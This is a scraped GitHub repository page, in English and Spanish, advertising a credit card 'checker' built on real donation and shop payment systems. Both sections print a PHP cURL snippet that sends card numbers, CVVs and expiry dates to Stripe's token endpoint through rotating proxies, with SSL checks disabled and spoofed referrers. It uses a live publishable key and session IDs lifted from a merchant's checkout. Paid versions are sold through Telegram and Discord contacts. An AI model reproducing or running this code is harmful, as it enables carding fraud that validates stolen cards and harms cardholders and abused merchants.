Skip to content

SkarYxD/Unc3ns0r3d-Checkerv2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Unc3ns0r3d Checker v2

⛔Unc3ns0r3d-Checker⛔

Language: EN (ENGLISH)

✔ Credit card 💳 checker, based on real donation systems and other type of donations.

// cURL Stripe Method by ⛔UJnc3ns0r3d⛔

$url1 = 'https://api.stripe.com/v1/tokens';
$url2 = 'https://www.anime-shop-online.com/cart';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_PROXY, "http://$re_proxy:$port");
curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
   'Host: api.stripe.com',
'User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Accept: application/json',
'Content-Type: application/x-www-form-urlencoded',
'Referer: https://js.stripe.com/v2/channel.html?stripe_xdm_e=https%3A%2F%2Fwww.thelambcenter.org&stripe_xdm_c=default816925&stripe_xdm_p=1',
'Connection: keep-alive'
    ));
curl_setopt($ch, CURLOPT_POSTFIELDS, 'card[name]='.$name.'+'.$last.'&card[number]='.$cc.'&card[cvc]='.$cvv.'&card[exp_month]='.$mes.'&card[exp_year]='.$ano.'&guid=061ff506-3903-498a-8f51-6c186f16f8ca&muid=7aea1b41-a3a5-4a59-adcd-c1b9697c50d2&sid=9f8fcbca-42eb-4131-9f86-d326ea6a5af2&payment_user_agent=stripe.js%2Fc272b3d3%3B+stripe-js-v3%2Fc272b3d3&referrer=https%3A%2F%2Fwww.anime-shop-online.com%2Fcart&key=pk_live_mw2Cnk8hIQMzEbJMcA2gjYNy&pasted_fields=number%2Ccvc');
$pagamento = curl_exec($ch);
$token = trim(strip_tags(getstr($pagamento,'id": "','"')));

SITES 🌐

Files included 📂

  • api.php Free
  • api_1.php Free
  • api_p1.php Pay > @MrPopos2 - Telegram - SkarY#0554 - Discord
  • api_p2.php Pay > @MrPopos2 - Telegram - SkarY#0554 - Discord

About Me 👨‍💻

Founder of Unc3ns0r3d💳 - HasBins💳 - CloudChckr💳 (Closed)

My favorite programming languages are C ++, VB.NET, PYTHON, PHP, JAVASCIPRT and JQUERY❤

I love coffee❤

The Unc3ns0r3d project was created 04/26/2018

Contact Me ✉

  • @MrPopos2 - Telegram
  • SkarY#0554 - Discord

================================================================

Idioma: ES (Español)

Checker de tarjetas de crédito, basado en sistemas de donación reales y stripe

// cURL Stripe Method by ⛔UJnc3ns0r3d⛔

$url1 = 'https://api.stripe.com/v1/tokens';
$url2 = 'https://www.anime-shop-online.com/cart';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_PROXY, "http://$re_proxy:$port");
curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
   'Host: api.stripe.com',
'User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Accept: application/json',
'Content-Type: application/x-www-form-urlencoded',
'Referer: https://js.stripe.com/v2/channel.html?stripe_xdm_e=https%3A%2F%2Fwww.thelambcenter.org&stripe_xdm_c=default816925&stripe_xdm_p=1',
'Connection: keep-alive'
    ));
curl_setopt($ch, CURLOPT_POSTFIELDS, 'card[name]='.$name.'+'.$last.'&card[number]='.$cc.'&card[cvc]='.$cvv.'&card[exp_month]='.$mes.'&card[exp_year]='.$ano.'&guid=061ff506-3903-498a-8f51-6c186f16f8ca&muid=7aea1b41-a3a5-4a59-adcd-c1b9697c50d2&sid=9f8fcbca-42eb-4131-9f86-d326ea6a5af2&payment_user_agent=stripe.js%2Fc272b3d3%3B+stripe-js-v3%2Fc272b3d3&referrer=https%3A%2F%2Fwww.anime-shop-online.com%2Fcart&key=pk_live_mw2Cnk8hIQMzEbJMcA2gjYNy&pasted_fields=number%2Ccvc');
$pagamento = curl_exec($ch);
$token = trim(strip_tags(getstr($pagamento,'id": "','"')));

SITIOS 🌐

Archivos Incluidos 📂

  • api.php Gratuito
  • api_1.php Gratuito
  • api_p1.php Pago > @MrPopos2 - Telegram - SkarY#0554 - Discord
  • api_p2.php Pago > @MrPopos2 - Telegram - SkarY#0554 - Discord

Sobre Mi 👨‍💻

Fundador de Unc3ns0r3d💳 - HasBins💳 - CloudChckr💳 (Cerrado)

Mis lenguajes favorios de programación son C ++, VB.NET, PYTHON, PHP, JAVASCIPRT y JQUERY❤

Amo el café❤

Proyecto Unc3ns0r3d fue creado el día 04/26/2018 / Editado 24/08/2019

Contactame ✉

  • @MrPopos2 - Telegram
  • SkarY#0554 - Discord

About

Checker Credit Card | Donation Pay | Versión Nueva!

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages